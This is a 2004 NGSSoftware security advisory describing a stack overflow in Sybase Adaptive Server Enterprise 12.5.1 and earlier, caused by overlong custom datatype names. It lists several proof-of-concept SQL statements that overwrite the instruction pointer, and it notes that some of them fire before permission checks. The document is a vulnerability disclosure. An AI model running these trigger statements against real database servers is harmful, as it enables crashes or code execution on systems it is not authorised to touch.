Skip to navigation Skip to main content Skip to footer

ASE 12.5.1 datatype overflow

NGSSoftware Insight Security Research Advisory

 

Name: Sybase ASE convert overflow

Systems Affected: Sybase Adaptive Server Enterprise 12.5.1 and lower

Severity: High

Vendor URL: http://www.sybase.com

Author: Sherief Hammad [ sherief@ngssoftware.com ]

Date of Technical Advisory: 25th June 2004

 

Details


 

There is an exploitable stack overflow in the Sybase handling of bespoke datatypes. Any SQL statement which as part of it syntax defines a datatype is vulnerable to this overflow. Access to these functions cannot be prohibited.

 

The bug can be observed by starting the Sybase server, attaching a debugger and then running the SQL statement:

 

declare @foo ‘AAAA…..AAAA’

 

9600 A’s is sufficient to cause the flow of control to be directed to the address 0x41414141(‘AAAA’ in hex) on a WindowsXP platform.

 

Other attack vectors to the same code are;

 

declare var1 ‘lotsofAs’

 

create table #foo (col1 ‘lotsofAs’)

 

alter table master.dbo.sysobjects add col1 ‘lotsofAs’

NB. breaks before checking perms

This obviously works with modify and add

 

 

create function foo ( var1 ‘lotsofAs’) reutrns int language java parameter

style java external name ‘java.test’

create function foo ( var1 int) reutrns ‘lotsofAs’ language java parameter

style java external name ‘java.test’

NB. breaks before checking perms

 

create procedure foo @var1 ‘lotsofAs’ as return 0

NB. breaks before checking perms

 

 

Fix Information


 

The vendor has not yet confirmed the existence of the bug.

 

About NGSSoftware


 

NGSSoftware design, research and develop intelligent, advanced application

security assessment scanners. Based in the United Kingdom, NGSSoftware have

offices in the South of London and the East Coast of Scotland. NGSSoftware’s

sister company NGSConsulting, offers best of breed security consulting

services, specializing in application, host and network security

assessments.

 

http://www.ngssoftware.com/

 

Telephone +44 208 401 0070

Fax +44 208 401 0076

 

enquiries@ngssoftware.com